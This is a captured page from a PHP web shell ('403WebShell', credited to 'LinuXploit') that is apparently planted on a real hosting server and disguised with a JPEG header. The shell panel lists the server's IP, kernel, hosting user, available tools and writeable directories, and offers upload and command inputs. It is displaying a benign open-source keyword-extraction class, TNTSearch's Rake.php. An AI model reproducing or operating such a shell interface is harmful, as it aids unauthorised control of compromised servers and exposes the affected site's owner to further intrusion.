����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 216.73.216.178
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/builderbox/public_html/vendor/teamtnt/tntsearch/src/KeywordExtraction/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/builderbox/public_html/vendor/teamtnt/tntsearch/src/KeywordExtraction/Rake.php
<?php

namespace TeamTNT\TNTSearch\KeywordExtraction;

class Rake
{
    public function __construct($language = "english")
    {
        $stopwords       = file_get_contents(__DIR__."/../Stopwords/".$language.".json");
        $this->stopwords = json_decode($stopwords);
    }

    public function extractKeywords($text, $includeScores = true)
    {
        $phraseList   = $this->generateCandidateKeywords($text);
        $wordScores   = $this->calculateWordScores($phraseList);
        $phraseScores = $this->calculatePhraseScores($phraseList, $wordScores);

        arsort($phraseScores);
        $oneThird = ceil(count($phraseScores) / 3) + 1;

        $phraseScores = array_slice($phraseScores, 0, $oneThird);
        if ($includeScores) {
            return $phraseScores;
        }
        return array_keys($phraseScores);
    }

    public function generateCandidateKeywords($text)
    {
        $phraseList = [];

        $words  = $this->tokenize($text);
        $phrase = [];

        foreach ($words as $word) {
            if (in_array($word, $this->stopwords) || ctype_punct($word)) {
                if (count($phrase) > 0) {
                    $phraseList[] = $phrase;
                    $phrase       = [];
                }
            } else {
                $phrase[] = $word;
            }
        }

        if (count($phrase) > 0) {
            $phraseList[] = $phrase;
            $phrase       = [];
        }

        return $phraseList;
    }

    public function calculatePhraseScores($phraseList, $wordScores)
    {

        $result = [];

        foreach ($phraseList as $phrase) {
            $wordScore = 0;

            foreach ($phrase as $word) {
                $wordScore += $wordScores[$word];
            }

            $result[implode(" ", $phrase)] = $wordScore;
        }

        return $result;
    }

    public function calculateWordScores($phraseList)
    {
        $result = [];

        foreach ($phraseList as $phrase) {
            foreach ($phrase as $word) {
                $wordScore     = $this->wordDegree($word, $phraseList) / $this->wordFrequency($word, $phraseList);
                $result[$word] = $wordScore;
            }
        }
        return $result;
    }

    public function wordDegree($word, $phraseList)
    {
        $count = 0;

        foreach ($phraseList as $phrase) {
            foreach ($phrase as $p) {
                if ($p == $word) {
                    $count += count($phrase);
                }
            }
        }
        return $count;
    }

    public function wordFrequency($word, $phraseList)
    {
        $count = 0;

        foreach ($phraseList as $phrase) {
            foreach ($phrase as $p) {
                if ($p == $word) {
                    $count++;
                }
            }
        }
        return $count;
    }

    public function returnFormatedPharaseList($phraseList)
    {
        $formatedList = [];
        foreach ($phraseList as $phrase) {
            $formatedList[] = implode(" ", $phrase);
        }
        return $formatedList;
    }

    public function tokenize($str)
    {
        $str = mb_strtolower($str);

        $arr = [];
        // for the character classes
        // see http://php.net/manual/en/regexp.reference.unicode.php
        $pat = '/
                    ([\pZ\pC]*)         # match any separator or other
                                        # in sequence
                    (
                        [^\pP\pZ\pC]+ | # match a sequence of characters
                                        # that are not punctuation,
                                        # separator or other
                        .               # match punctuations one by one
                    )
                    ([\pZ\pC]*)         # match a sequence of separators
                                        # that follows
                /xu';

        preg_match_all($pat, $str, $arr);
        return $arr[2];
    }

}

Youez - 2016 - github.com/yon3zu
LinuXploit